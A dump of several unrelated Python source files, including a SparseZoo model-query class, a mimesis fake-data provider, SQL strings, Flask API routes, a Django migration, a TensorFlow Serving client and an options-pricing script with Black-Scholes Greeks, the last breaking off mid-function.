        framework: Union[str, List[str], None] = None,
        repo: Union[str, List[str], None] = None,
        dataset: Union[str, List[str], None] = None,
        training_scheme: Union[str, List[str], None] = None,
        optim_name: Union[str, List[str], None] = None,
        optim_category: Union[str, List[str], None] = None,
        optim_target: Union[str, List[str], None] = None,
        release_version: Union[str, Any, None] = None,
        **kwargs,
    ):
        self._domain = domain
        self._sub_domain = sub_domain
        self._architecture = architecture
        self._sub_architecture = sub_architecture
        self._framework = framework
        self._repo = repo
        self._dataset = dataset
        self._training_scheme = training_scheme
        self._optim_name = optim_name
        self._optim_category = optim_category
        self._optim_target = optim_target
        self._release_version = release_version

    @property
    def domain(self) -> Union[str, None]:
        """Model domain, e.g. cv, nlp."""
        return self._domain

    @property
    def sub_domain(self) -> Union[str, None]:
        """Model sub domain, e.g. classification, segmentation."""
        return self._sub_domain

    @property
    def architecture(self) -> Union[str, List[str], None]:
        """Model architecture, e.g. resnet_v1, mobilenet_v1."""
        return self._architecture

    @property
    def sub_architecture(self) -> Union[str, List[str], None]:
        """Sub architecture (scaling factor), e.g. 50, 101, 152."""
        return self._sub_architecture

    @property
    def framework(self) -> Union[str, List[str], None]:
        """Training framework, e.g. pytorch, tensorflow."""
        return self._framework

    @property
    def repo(self) -> Union[str, List[str], None]:
        """Source repo, e.g. sparseml, torchvision."""
        return self._repo

    @property
    def dataset(self) -> Union[str, List[str], None]:
        """Training dataset, e.g. imagenet, cifar10."""
        return self._dataset

    @property
    def training_scheme(self) -> Union[str, List[str], None]:
        """Training scheme used, if any, e.g. augmented."""
        return self._training_scheme

    @property
    def optim_name(self) -> Union[str, List[str], None]:
        """Optimization name, e.g. base, pruned, pruned_quant."""
        return self._optim_name

    @property
    def optim_category(self) -> Union[str, List[str], None]:
        """Degree of optimization, e.g. none, conservative, moderate, aggressive."""
        return self._optim_category

    @property
    def optim_target(self) -> Union[str, List[str], None]:
        """Optimization deployment target, e.g. edge, deepsparse, gpu."""
        return self._optim_target

    @property
    def release_version(self) -> Union[str, None]:
        """Sparsezoo release version for the model."""
        return self._release_version

    @property
    def architecture_id(self) -> str:
        """Unique architecture id: architecture plus optional sub_architecture."""
        if not self.architecture:
            return ""
        identifier = f"{self.architecture}"
        if self.sub_architecture:
            identifier += f"-{self.sub_architecture}"
        return identifier

    @property
    def training_id(self) -> str:
        """Unique training id: dataset plus optional training_scheme."""
        if not self.dataset:
            return ""
        identifier = f"{self.dataset}"
        if self.training_scheme:
            identifier += f"-{self.training_scheme}"
        return identifier

    @property
    def optimization_id(self) -> str:
        """Unique optimization id: optim_name[-optim_category[-optim_target]].

        optim_target only appears when optim_category is also present,
        keeping the path components unambiguous.
        """
        if not self.optim_name:
            return ""
        identifier = f"{self.optim_name}"
        if self.optim_category:
            identifier += f"-{self.optim_category}"
            if self.optim_target:
                identifier += f"-{self.optim_target}"
        return identifier

    @property
    def model_url_root(self) -> str:
        """Root path of the model in the sparsezoo: domain[/sub_domain]."""
        if not self.domain:
            return ""
        root = f"{self.domain}"
        if self.sub_domain:
            root += f"/{self.sub_domain}"
        return root

    @property
    def stub(self) -> str:
        """Full sparsezoo path for the model (empty components kept as '')."""
        pieces = [
            self.model_url_root,
            self.architecture_id,
            f"{self.framework}" if self.framework else "",
            f"{self.repo}" if self.repo else "",
            self.training_id,
            self.optimization_id,
        ]
        return "/".join(pieces)

    @property
    def model_url_args(self) -> List[str]:
        """Query arguments ("field=value") for searching the sparsezoo."""
        query_fields = (
            "architecture",
            "sub_architecture",
            "framework",
            "repo",
            "dataset",
            "training_scheme",
            "optim_name",
            "optim_category",
            "optim_target",
        )
        args = []
        for field in query_fields:
            value = getattr(self, field)
            if not value:
                continue
            if isinstance(value, List):
                # List-valued fields expand into one arg per item.
                args.extend(f"{field}={item}" for item in value)
            else:
                args.append(f"{field}={value}")
        return args
|
12,724 | d8f9c39a541b3a9b67c6533f69a8f2df4c453817 | """Data related to the development."""
import typing as t
from datetime import datetime
from mimesis.data import (
LICENSES,
OS,
PROGRAMMING_LANGS,
SYSTEM_QUALITY_ATTRIBUTES,
)
from mimesis.enums import DSNType
from mimesis.providers.base import BaseProvider
from mimesis.providers.internet import Internet
__all__ = ["Development"]
class Development(BaseProvider):
    """Class for getting fake data for Developers."""

    def __init__(self, *args: t.Any, **kwargs: t.Any) -> None:
        super().__init__(*args, **kwargs)
        # Share this provider's RNG with the nested Internet provider so
        # seeded generation stays reproducible.
        self._internet = Internet(
            random=self.random,
            *args,
            **kwargs,
        )
        # Captured once; version(calver=True) uses it as the year upper bound.
        self._now = datetime.now()

    class Meta:
        # Provider lookup name within mimesis.
        name = "development"

    def dsn(self, dsn_type: t.Optional[DSNType] = None, **kwargs: t.Any) -> str:
        """Generates a random DSN (Data Source Name).

        :param dsn_type: DSN type.
        :param kwargs: Additional arguments for Internet.hostname().
        :return: DSN string of the form "scheme://hostname:port".
        """
        hostname = self._internet.hostname(**kwargs)
        scheme, port = self.validate_enum(dsn_type, DSNType)
        return f"{scheme}://{hostname}:{port}"

    def software_license(self) -> str:
        """Get a random software license.

        :return: License name.

        :Example:
            The BSD 3-Clause License.
        """
        return self.random.choice(LICENSES)

    def version(self, calver: bool = False, pre_release: bool = False) -> str:
        """Generate version number.

        :param calver: Calendar versioning (year-based major component).
        :param pre_release: Append a pre-release suffix (-alpha/-beta/-rc.N).
        :return: Version.

        :Example:
            0.2.1
        """
        if calver:
            # CalVer: major is a year between 2016 and now.
            major = self.random.randint(2016, self._now.year)
            minor, patch = self.random.randints(2, 1, 10)
        else:
            major, minor, patch = self.random.randints(3, 0, 10)
        version = f"{major}.{minor}.{patch}"
        if pre_release:
            suffix = self.random.choice(("alpha", "beta", "rc"))
            number = self.random.randint(1, 11)
            version = f"{version}-{suffix}.{number}"
        return version

    def programming_language(self) -> str:
        """Get a random programming language from the list.

        :return: Programming language.

        :Example:
            Erlang.
        """
        return self.random.choice(PROGRAMMING_LANGS)

    def os(self) -> str:
        """Get a random operating system or distributive name.

        :return: The name of OS.

        :Example:
            Gentoo
        """
        return self.random.choice(OS)

    def boolean(self) -> bool:
        """Get a random boolean value.

        :return: True of False.
        """
        return self.random.choice([True, False])

    def system_quality_attribute(self) -> str:
        """Get a random system quality attribute.

        Within systems engineering, quality attributes are realized
        non-functional requirements used to evaluate the performance
        of a system. These are sometimes named "ilities" after the
        suffix many of the words share.

        :return: System quality attribute.
        """
        return self.random.choice(SYSTEM_QUALITY_ATTRIBUTES)

    def ility(self) -> str:
        """Get a random system quality attribute.

        An alias for system_quality_attribute().
        """
        return self.system_quality_attribute()
|
12,725 | c3c4e4f8c6425dac1e5dd9fb8a795f929153b01a | eat_activeusers_daily = """
SELECT %s s_day, count(distinct(user_id)) active_users
FROM log_record
WHERE log_time_in_millisecond >= %s
AND log_time_in_millisecond < %s
AND user_id IS NOT NULL
"""
# Upsert the daily active-user count, keyed on s_day.
insert_eat_activeusers_daily = """
insert into huoli_eat_activeusers_daily_test values (%s, %s, now(), now())
on duplicate key update updatetime = now() ,
s_day = VALUES(s_day),
active_users = VALUES(active_users)
"""
# NOTE: the weekly/monthly SELECTs below are textually identical to the daily
# one — the aggregation period is determined solely by the bound time-range
# parameters supplied by the caller, not by the SQL itself.
eat_activeusers_weekly = """
SELECT %s s_day, count(distinct(user_id)) active_users
FROM log_record
WHERE log_time_in_millisecond >= %s
AND log_time_in_millisecond < %s
AND user_id IS NOT NULL
"""
# Upsert the weekly active-user count.
insert_eat_activeusers_weekly = """
insert into huoli_eat_activeusers_weekly_test values (%s, %s, now(), now())
on duplicate key update updatetime = now() ,
s_day = VALUES(s_day),
active_users = VALUES(active_users)
"""
eat_activeusers_monthly = """
SELECT %s s_day, count(distinct(user_id)) active_users
FROM log_record
WHERE log_time_in_millisecond >= %s
AND log_time_in_millisecond < %s
AND user_id IS NOT NULL
"""
# Upsert the monthly active-user count.
insert_eat_activeusers_monthly = """
insert into huoli_eat_activeusers_monthly_test values (%s, %s, now(), now())
on duplicate key update updatetime = now() ,
s_day = VALUES(s_day),
active_users = VALUES(active_users)
"""
# Quarterly variant: the label is built in SQL as 'YYYY,Qn' from the date.
eat_activeusers_quarterly = """
SELECT CONCAT(YEAR(%s),',','Q',QUARTER(%s)) s_day, count(distinct(user_id)) active_users
FROM log_record
WHERE log_time_in_millisecond >= %s
AND log_time_in_millisecond < %s
AND user_id IS NOT NULL
"""
# Upsert the quarterly active-user count.
insert_eat_activeusers_quarterly = """
insert into huoli_eat_activeusers_quarterly_test values (%s, %s, now(), now())
on duplicate key update updatetime = now() ,
s_day = VALUES(s_day),
active_users = VALUES(active_users)
"""
|
12,726 | a3e80a46cd3e66c362e76a30db5c2ac423b65edb | from .errors import *
from flask import jsonify, send_file
from app import db
from . import api, get_query_string
from app.main.models import *
from app.main.controllers import GSECMonthlyRecon, GSECMonthlyReconReport
# gsec code section #############################################
@api.route('/gseccodes', methods=['GET'])
def get_gseccodes():
    """Return all GSEC codes matching the query string, as JSON,
    sorted by SortingScore descending."""
    matches = GSECCode.query.filter_by(**get_query_string(GSECCode)).all()
    ranked = sorted(matches, key=lambda c: c.SortingScore, reverse=True)
    return jsonify([c.to_json() for c in ranked]), 200
@api.route('/gseccodelist', methods=['GET'])
def get_gseccodelist():
    """Return the bare list of GSEC code strings, sorted by SortingScore
    descending."""
    ranked = sorted(GSECCode.query.all(),
                    key=lambda c: c.SortingScore,
                    reverse=True)
    codes = [c.Code for c in ranked]
    return jsonify(codes), 200
@api.route('/gseccodes/<string:Oid_or_Code>', methods=['GET'])
def get_gseccode(Oid_or_Code):
    """Fetch one GSEC code by Oid (long identifiers) or Code (short ones);
    404 if not found."""
    # Oids are long (GUID-like); anything over 20 chars is treated as one.
    lookup = {'Oid': Oid_or_Code} if len(Oid_or_Code) > 20 else {'Code': Oid_or_Code}
    code = GSECCode.query.filter_by(**lookup).first_or_404()
    return jsonify(code.to_json()), 200
@api.route('/gseccodes', methods=['POST'])
def create_gseccode():
    """Create a GSECCode from the request's JSON body; return it with 201."""
    # NOTE(review): `request` is not in this module's visible flask import
    # (only jsonify/send_file) — presumably provided by one of the star
    # imports at the top of the file; confirm.
    json_gcode = request.json
    code = GSECCode.from_json(json_gcode)
    db.session.add(code)
    db.session.commit()
    return jsonify(code.to_json()), 201
@api.route('/gseccodes/<string:code>/recon/<int:year>', methods=['GET'])
def get_monthly_recon(code, year):
    """Return the monthly reconciliation report for `code`/`year` as JSON."""
    return jsonify(GSECMonthlyRecon(code, year).report), 200
@api.route('/gseccodes/<string:code>/recon/<string:year>/report',
methods=['GET'])
def get_monthly_recon_report(code, year):
    """Build the monthly recon for `code`/`year` and stream it as an
    .xlsx attachment."""
    code = code.upper()
    recon = GSECMonthlyRecon(code, year)
    data = {'gseccode': code, 'data': recon.report}
    report = GSECMonthlyReconReport()
    file_name = code + '_' + year + '.xlsx'
    # NOTE(review): `attachment_filename` was renamed `download_name` in
    # Flask 2.0 — fine on Flask 1.x, breaks on 2.x; confirm pinned version.
    return send_file(report.get_report_xlsx(data),
                     mimetype='application/vnd.ms-excel',
                     attachment_filename=file_name,
                     as_attachment=True)
|
12,727 | ce3288817e0b1a89b61d4cb616332c65d83de8b0 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-24 14:08
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: syncs FoiRequest Meta options (ordering,
    latest-by field, custom permissions, verbose names) with the model.
    Schema is unchanged — AlterModelOptions only touches Django state."""
    dependencies = [
        ("foirequest", "0007_auto_20171121_1134"),
    ]
    operations = [
        migrations.AlterModelOptions(
            name="foirequest",
            options={
                "get_latest_by": "last_message",
                "ordering": ("-last_message",),
                "permissions": (
                    ("see_private", "Can see private requests"),
                    ("create_batch", "Create batch requests"),
                ),
                "verbose_name": "Freedom of Information Request",
                "verbose_name_plural": "Freedom of Information Requests",
            },
        ),
    ]
|
12,728 | 8fc532edc796e5785ca98f3d1aa5e02a309874cc | import json
import grpc
import numpy as np
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2_grpc
# Address of the TensorFlow Serving gRPC endpoint.
hostport="localhost:8500"
channel = grpc.insecure_channel(hostport)
stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
# Build a PredictRequest against the model's default serving signature.
request = predict_pb2.PredictRequest()
request.model_spec.name = 'model'
request.model_spec.signature_name = 'serving_default'
x = [1.0, 2.0, 5.0]
proto = tf.make_tensor_proto(np.array(x), dtype=float)
request.inputs['x'].CopyFrom(proto)
# Async call; the second positional argument (10.25) is the RPC timeout in seconds.
result_future = stub.Predict.future(request, 10.25)
# NOTE(review): result() returns a PredictResponse protobuf, so np.array()
# wraps it as a 0-d object array instead of extracting the output tensor —
# tf.make_ndarray(response.outputs[...]) was probably intended; confirm.
response = np.array(result_future.result())
print(response)
|
12,729 | 72b4efc7c67b7f4c4b52d2cca39d5e9f4af85178 | import csv
import os
import numpy as np
import pandas as pd
from pandas import DataFrame
from math import log, exp, pi, sqrt
from scipy.stats import norm
import collections
from datetime import date
from recordtype import recordtype
from scipy.interpolate import make_interp_spline, BSpline
import matplotlib.pyplot as plt
from sklearn.metrics import mean_squared_error
###############
def get_files(folder):
    """Return the entry names inside `folder`, resolved against the CWD.

    Uses os.path.join instead of the original hard-coded '\\' separator,
    which only worked on Windows.

    :param folder: directory name relative to the current working directory.
    :return: list of file/directory names (os.listdir order).
    """
    path = os.path.join(os.getcwd(), folder)
    return os.listdir(path)
# Interactive bootstrap: volatility is entered as a percentage and stored as
# a fraction; spotp is the current underlying spot price. (Fixed the
# "Volaitilty" typo in the prompt.)
volatility = float(input("Initial Volatility %")) / 100.0
spotp = float(input("Initial Spot Price\n"))
#print(spotp)
###############
def d1(S, K, T, sig, r):
    """Upper Black-Scholes d-term used by the pricers.

    NOTE(review): the rate `r` is accepted but unused — the drift term is
    omitted, so this matches the textbook d1 only when r == 0.
    """
    log_moneyness = log(S / K)
    half_variance = (sig ** 2) * T / 2.0
    vol_sqrt_t = sig * sqrt(T)
    return (log_moneyness + half_variance) / vol_sqrt_t
def d2(S, K, T, sig, r):
    """Lower Black-Scholes d-term (d1 minus sig*sqrt(T)); `r` is unused,
    mirroring d1()."""
    log_moneyness = log(S / K)
    half_variance = (sig ** 2) * T / 2.0
    vol_sqrt_t = sig * sqrt(T)
    return (log_moneyness - half_variance) / vol_sqrt_t
def CallPrice(S, K, T, sig, r):
    """Discounted call price: exp(-rT) * (S*N(d1) - K*N(d2)), with this
    file's r-less d-terms inlined (identical arithmetic)."""
    log_moneyness = log(S / K)
    half_variance = (sig ** 2) * T / 2.0
    vol_sqrt_t = sig * sqrt(T)
    d_plus = (log_moneyness + half_variance) / vol_sqrt_t
    d_minus = (log_moneyness - half_variance) / vol_sqrt_t
    return exp(-r * T) * (S * norm.cdf(d_plus) - K * norm.cdf(d_minus))
def PutPrice(S, K, T, sig, r):
    """Discounted put price: exp(-rT) * (K*N(-d2) - S*N(-d1)).

    Fixes the original `exp(-r * T)(t1 - t2)`, which *called* the float
    returned by exp() (TypeError at runtime) instead of multiplying.
    The file's r-less d-terms are inlined with identical arithmetic.
    """
    log_moneyness = log(S / K)
    half_variance = (sig ** 2) * T / 2.0
    vol_sqrt_t = sig * sqrt(T)
    d_plus = (log_moneyness + half_variance) / vol_sqrt_t
    d_minus = (log_moneyness - half_variance) / vol_sqrt_t
    t1 = K * norm.cdf(-1 * d_minus)
    t2 = S * norm.cdf(-1 * d_plus)
    return exp(-r * T) * (t1 - t2)
# Call Greeks formulae
def c_delta(S, K, T, sig, r):
    """Delta of a call option: N(d1)."""
    d_one = d1(S, K, T, sig, r)
    return norm.cdf(d_one)
def c_theta(S, K, T, sig, r):
    """Per-calendar-day theta of a call option (negative: time decay)."""
    decay = (S * norm.pdf(d1(S, K, T, sig, r)) * sig) / (2 * sqrt(T))
    carry = r * K * exp(-r * T) * norm.cdf(d2(S, K, T, sig, r))
    return (-decay - carry) / 365.0
def c_gamma(S, K, T, sig, r):
    """Gamma of a call option: pdf(d1) / (S * sig * sqrt(T))."""
    density = norm.pdf(d1(S, K, T, sig, r))
    return density / (S * sig * sqrt(T))
def c_vega(S, K, T, sig, r):
    """Vega of a call option (sensitivity to a unit change in volatility)."""
    d_one = d1(S, K, T, sig, r)
    return S * norm.pdf(d_one) * sqrt(T)
def numOfDays(date1, date2):
    """Days from date1 to date2 (negative when date2 is earlier)."""
    delta = date2 - date1
    return delta.days
# Put Greeks formulae
def p_delta(S, K, T, sig, r):
    """Delta of a put option: the call delta N(d1) minus one."""
    call_delta = norm.cdf(d1(S, K, T, sig, r))
    return call_delta - 1
def p_theta(S, K, T, sig, r):
    """Per-calendar-day theta of a put option.

    NOTE(review): textbook Black-Scholes put theta uses N(-d2) in the carry
    term; this file uses N(d2) — flagged only, behavior preserved.
    """
    decay = (S * norm.pdf(d1(S, K, T, sig, r)) * sig) / (2 * sqrt(T))
    carry = r * K * exp(-r * T) * norm.cdf(d2(S, K, T, sig, r))
    return (carry - decay) / 365.0
def p_gamma(S, K, T, sig, r):
    """Gamma of a put option (same formula as the call gamma)."""
    density = norm.pdf(d1(S, K, T, sig, r))
    return density / (S * sig * sqrt(T))
def p_vega(S, K, T, sig, r):
    """Vega of a put option (numerically identical to c_vega)."""
    d_one = d1(S, K, T, sig, r)
    return S * norm.pdf(d_one) * sqrt(T)
# calculate number of days from current date till expiry date
def calculate_t(current_date, expiry_date):
    """Number of days between two 'dd-mm-yyyy' date strings.

    Replaces the original manual character slicing with datetime.strptime,
    which also validates the format (the old code ignored the separator
    characters entirely; this version requires '-', matching the prompts
    used elsewhere in this script).

    :param current_date: start date, 'dd-mm-yyyy'.
    :param expiry_date: end date, 'dd-mm-yyyy'.
    :return: (expiry_date - current_date) in days, as an int.
    """
    fmt = "%d-%m-%Y"
    start = datetime.strptime(current_date, fmt).date()
    end = datetime.strptime(expiry_date, fmt).date()
    return (end - start).days
# Plot graphs for call options and put options separately and for each expiry date separately to observe the difference between old premium and new premium
def plot_init_final(files):
    """For each input/output file pair, plot old vs new premium curves
    against strike price and save '<name>-Before-After.jpg' into Graph/.

    Curve segments are color-coded by which side of the spot price they
    fall on; dashed = old premium, solid = estimated new premium.

    Fix: the original removed '.jpg' entries from processed_files while
    iterating over it, which skips consecutive .jpg files; replaced with a
    filtering comprehension.
    """
    spot_price = spotp
    # Keep only the CSV outputs produced by the greeks functions.
    processed_files = [pf for pf in get_files("Graph") if pf[-4:] != ".jpg"]
    # NOTE(review): files and processed_files are paired by listing order —
    # assumes both directories list in the same order; confirm.
    for f, pf in zip(files, processed_files):
        # Old premium values (DataFrame.as_matrix() is removed in modern
        # pandas — .values/.to_numpy() is the replacement; kept as-is).
        df = pd.read_csv('Data//'+f ,sep = ',', header = None, skiprows = 1)
        before_matrix = df.as_matrix()
        ix = before_matrix[:,0] # Strike Price
        iy = before_matrix[:,1] #Premium
        # Estimated 'new premium' values
        df = pd.read_csv('Graph//'+pf ,sep = ',', header = None, skiprows = 1)
        after_matrix = df.as_matrix()
        fx = after_matrix[:,0] # Strike Price
        fy = after_matrix[:,1] #Premium
        # File names encode the option type at index 5 ('c' = call).
        if pf[5] == "c":
            fig = plt.figure()
            # Vertical marker at the spot price.
            plt.plot([spot_price , spot_price ] , [0 , 2000] , 'b' )
            # Initial (old premium) curve, dashed.
            for x1, x2, y1, y2 in zip(ix, ix[1: ], iy, iy[1: ]):
                if x1 > spot_price:
                    plt.plot([x1, x2], [y1, y2], 'y', linestyle = '--')
                elif x1 < spot_price:
                    plt.plot([x1, x2], [y1, y2], 'c' , linestyle = '--' )
                else:
                    plt.plot([x1, x2], [y1, y2], 'b', marker = '.' )
            # Final (new premium) curve, solid.
            for x1, x2, y1, y2 in zip(fx, fx[1: ], fy, fy[1: ]):
                if x1 > spot_price:
                    plt.plot([x1, x2], [y1, y2], 'r', linestyle = '-')
                elif x1 < spot_price:
                    plt.plot([x1, x2], [y1, y2], 'g' , linestyle = '-' )
                else:
                    plt.plot([x1, x2], [y1, y2], 'b', marker = '.' )
            fig.suptitle(f, fontsize=16)
            plt.xlabel('strike price', fontsize = 14)
            plt.ylabel('new premium', fontsize = 14)
            fig.savefig('Graph//'+f[0:-4] +'-Before-After' + '.jpg')
        else:
            # Put options: same layout with the ITM/OTM colors mirrored.
            fig = plt.figure()
            plt.plot([spot_price , spot_price ] , [0 , 2000] , 'b' )
            for x1, x2, y1, y2 in zip(ix, ix[1: ], iy, iy[1: ]):
                if x1 > spot_price:
                    plt.plot([x1, x2], [y1, y2], 'c',linestyle = '--')
                elif x1 < spot_price:
                    plt.plot([x1, x2], [y1, y2], 'y',linestyle = '--')
                else:
                    plt.plot([x1, x2], [y1, y2], 'b', marker = 'o')
            for x1, x2, y1, y2 in zip(fx, fx[1: ], fy, fy[1: ]):
                if x1 > spot_price:
                    plt.plot([x1, x2], [y1, y2], 'g',linestyle = '-')
                elif x1 < spot_price:
                    plt.plot([x1, x2], [y1, y2], 'r',linestyle = '-')
                else:
                    plt.plot([x1, x2], [y1, y2], 'b', marker = 'o')
            fig.suptitle(f, fontsize=16)
            plt.xlabel('strike price', fontsize = 14)
            plt.ylabel('new premium', fontsize = 14)
            fig.savefig('Graph//'+f[:-4] +'-Before-After' + '.jpg')
#To Plot only Calls
def plot_calls(files):
    """Plot the *initial* premium curve of every call file on one figure,
    save it, then chain into plot_call_after() for the estimated curves.

    File names encode the option type at index 5 ('c' = call); the expiry
    label is read from the first data row (skiprows=1 drops the header).
    """
    calls = list(filter(lambda x: x[5]=="c", files))
    fig1 = plt.figure(1)
    # Vertical marker at the global spot price.
    plt.plot([spotp , spotp ] , [0 , 2000] , 'b' )
    for f in calls:
        df = pd.read_csv('Data//'+f ,sep = ',', header = None, skiprows = 1)
        before_matrix = df.as_matrix()
        x = before_matrix[:,0] # Strike Price
        y = before_matrix[:,1] #Premium
        expiry = list(before_matrix[:3,3])
        #print(expiry)
        plt.plot(x,y,label=expiry[0])
    fig1.suptitle("Calls Before", fontsize=16)
    plt.xlabel('Strike Price', fontsize = 14)
    plt.ylabel('Premium', fontsize = 14)
    plt.legend()
    plt.show()
    fig1.savefig('Graph//Plot_Calls_1Before' + '.jpg')
    plot_call_after()
def plot_call_after():
    """Plot the *estimated* premium curve of every call output CSV in
    Graph/ on one figure and save it as Plot_Calls_2After.jpg."""
    call_f = get_files("Graph")
    # Output CSVs only; the generated .jpg files are filtered out here.
    call_files = list(filter(lambda x: x[5]=="c" and x[-4:]==".csv", call_f))
    fig2 = plt.figure(2)
    plt.plot([spotp , spotp ] , [0 , 2000] , 'b' )
    for cf in call_files:
        df = pd.read_csv('Graph//'+cf ,sep = ',', header = None, skiprows = 1)
        before_matrix = df.as_matrix()
        x = before_matrix[:,0] # Strike Price
        y = before_matrix[:,1] #Premium
        # Expiry label comes from column 6 of the output CSV.
        expiry = list(before_matrix[:6,6])
        #print(expiry)
        plt.plot(x,y,label=expiry[0])
    fig2.suptitle("Calls After", fontsize=16)
    plt.xlabel('Strike Price', fontsize = 14)
    plt.ylabel('Premium', fontsize = 14)
    plt.legend()
    plt.show()
    fig2.savefig('Graph//Plot_Calls_2After' + '.jpg')
#plot put
def plot_puts(files):
    """Plot the *initial* premium curve of every put file on one figure,
    save it, then chain into plot_put_after() for the estimated curves."""
    puts = list(filter(lambda x: x[5]=="p", files))
    fig1 = plt.figure(3)
    plt.plot([spotp , spotp ] , [0 , 2000] , 'b' )
    for f in puts:
        df = pd.read_csv('Data//'+f ,sep = ',', header = None, skiprows = 1)
        before_matrix = df.as_matrix()
        x = before_matrix[:,0] # Strike Price
        y = before_matrix[:,1] #Premium
        expiry = list(before_matrix[:3,3])
        #print(expiry)
        plt.plot(x,y,label=expiry[0])
    fig1.suptitle("Puts Before", fontsize=16)
    plt.xlabel('Strike Price', fontsize = 14)
    plt.ylabel('Premium', fontsize = 14)
    plt.legend()
    plt.show()
    fig1.savefig('Graph//Plot_Puts_1Before' + '.jpg')
    plot_put_after()
def plot_put_after():
    """Plot the *estimated* premium curve of every put output CSV in
    Graph/ on one figure and save it as Plot_Puts_2After.jpg."""
    put_f = get_files("Graph")
    put_files = list(filter(lambda x: x[5]=="p" and x[-4:]==".csv", put_f))
    fig2 = plt.figure(4)
    plt.plot([spotp , spotp ] , [0 , 2000] , 'b' )
    for pf in put_files:
        df = pd.read_csv('Graph//'+pf ,sep = ',', header = None, skiprows = 1)
        before_matrix = df.as_matrix()
        x = before_matrix[:,0] # Strike Price
        y = before_matrix[:,1] #Premium
        expiry = list(before_matrix[:6,6])
        #print(expiry)
        plt.plot(x,y,label=expiry[0])
    fig2.suptitle("Puts After", fontsize=16)
    plt.xlabel('Strike Price', fontsize = 14)
    plt.ylabel('Premium', fontsize = 14)
    plt.legend()
    plt.show()
    fig2.savefig('Graph//Plot_Puts_2After' + '.jpg')
# Plot graphs for call options and put options together so as to compare the 'new premium' for different expiry dates for both options
def plot_multiple(files):
    """Overlay the new-premium curves of every output file onto the shared
    pyplot figure, saving a cumulative snapshot per file into Graph/.

    NOTE(review): no new figure is created per iteration (see the commented
    plt.figure()), so each saved .jpg accumulates all curves so far —
    possibly intentional given the "Changes in All Graphs" title; confirm.
    NOTE(review): every Graph/ entry (including .jpg files) is assumed to
    have a '<stem>.csv' counterpart — read_csv fails otherwise; confirm.
    """
    processed_files = get_files("Graph")
    spot_price = spotp
    graph_data = []
    for pfiles in processed_files:
        pf = pfiles[0:-4]
        pfname = "Graph//" + pf + ".csv"
        df = pd.read_csv(pfname ,sep = ',', header = None, skiprows = 1)
        numpy_matrix = df.as_matrix()
        x = numpy_matrix[:,0] # Strike Price
        y = numpy_matrix[:,1] #Premium
        graph_data.append([x,y])
        #fig = plt.figure()
        #print(spot_price)
        plt.suptitle("Changes in All Graphs")
        if pf[5] == "c": #call options output
            plt.plot([spot_price , spot_price ] , [0 , 2500] , 'b' )
            for x1, x2, y1, y2 in zip(x, x[1: ], y, y[1: ]):
                if x1 > spot_price:
                    plt.plot([x1, x2], [y1, y2], 'r', linestyle = '-')
                elif x1 < spot_price:
                    plt.plot([x1, x2], [y1, y2], 'g' , linestyle = '-' )
                else:
                    plt.plot([x1, x2], [y1, y2], 'b', marker = '.' )
        else: #put options output
            plt.plot([spot_price , spot_price ] , [0 , 2000] , 'b' )
            for x1, x2, y1, y2 in zip(x, x[1: ], y, y[1: ]):
                if x1 > spot_price:
                    plt.plot([x1, x2], [y1, y2], 'c',linestyle = '-')
                elif x1 < spot_price:
                    plt.plot([x1, x2], [y1, y2], 'y',linestyle = '-')
                else:
                    plt.plot([x1, x2], [y1, y2], 'b', marker = 'o')
        plt.xlabel('strike price', fontsize = 14)
        plt.ylabel('new premium', fontsize = 14)
        plt.savefig('Graph//'+pf + '.jpg')
def calculate_rmse():
    """Compute the RMSE between actual premiums (Actual_Data/) and the
    estimated premiums (Graph/*.csv), write a summary CSV, and return the
    list of RMSE values.

    NOTE(review): actual and estimate files are paired purely by listing
    order (zip of two os.listdir results) — fragile; confirm the names
    line up. `df.as_matrix()` and `np.float` are removed in modern
    pandas/numpy (.to_numpy() / float are the replacements).
    """
    estimate_files = get_files("Graph")
    estimate_files = list(filter(lambda x: x[-4:]==".csv" , estimate_files))
    #print(list(estimate_files))
    actual_files = get_files("Actual_Data")
    #print(actual_files)
    rmse_list = []
    for af,ef in zip(actual_files , estimate_files):
        df = pd.read_csv("Actual_Data//"+af , usecols = ['premium'])
        x = df.as_matrix()
        actual_data = x.astype(np.float)
        #print(actual_data)
        df = pd.read_csv("Graph//"+ef, usecols = ['new_premium'])
        x = df.as_matrix()
        estimated_data = x.astype(np.float)
        #print(estimated_data)
        rmse = sqrt(mean_squared_error(actual_data, estimated_data))
        #print(rmse)
        rmse_list.append(rmse)
    df = pd.DataFrame(data = {"File Name": estimate_files , "Actual Price file": actual_files ,"RMSE":rmse_list})
    df.to_csv(r'Graph//RMSE', sep = ',', index = False)
    return rmse_list
'''def plot_output(file_name, option_type):
spot_price = 9100
f = file_name[2: -4]
print(file_name)
print(f)
fname = f + ".csv"
df = pd.read_csv(fname, sep = ',', header = None, skiprows = 1)
numpy_matrix = df.as_matrix()
y = numpy_matrix[: , 1]# Strike Price
x = numpy_matrix[: , 0]# Premium
fig = plt.figure()
if option_type == "call":
for x1, x2, y1, y2 in zip(x, x[1: ], y, y[1: ]):
if x1 > spot_price:
plt.plot([x1, x2], [y1, y2], 'g')
elif x1 < spot_price:
plt.plot([x1, x2], [y1, y2], 'r')
else:
plt.plot([x1, x2], [y1, y2], 'b', marker = '.')
else:
for x1, x2, y1, y2 in zip(x, x[1: ], y, y[1: ]):
if x1 > spot_price:
plt.plot([x1, x2], [y1, y2], 'r')
elif x1 < spot_price:
plt.plot([x1, x2], [y1, y2], 'g')
else:
plt.plot([x1, x2], [y1, y2], 'b', marker = 'o')
fig.suptitle(f, fontsize=16)
plt.xlabel('strike price', fontsize = 14)
plt.ylabel('new premium', fontsize = 14)
fig.savefig(f + '.jpg')
plt.show() '''
def call_greeks(database, fname , change_in_spot_price , change_in_volatility , user_date):
    """Estimate new call premiums from a Greeks-based expansion and write
    'Graph//<fname>_output.csv'.

    :param database: option records from process_options().
    :param fname: source CSV name, used to derive the output file name.
    :param change_in_spot_price: shift applied to the underlying spot.
    :param change_in_volatility: volatility shift as a fraction (not %).
    :param user_date: valuation date 'dd-mm-yyyy', or '' to value at expiry.
    """
    strike_list = []
    new_premium_list = []
    old_premium_list = []
    change_list = []
    curr_date_list = []
    user_date_list = []
    expiry_date_list = []
    v = volatility
    # All greeks are calculated using greeks formulae for call options.
    # The new premium is calculated as a cascading effect of the greeks as follows:
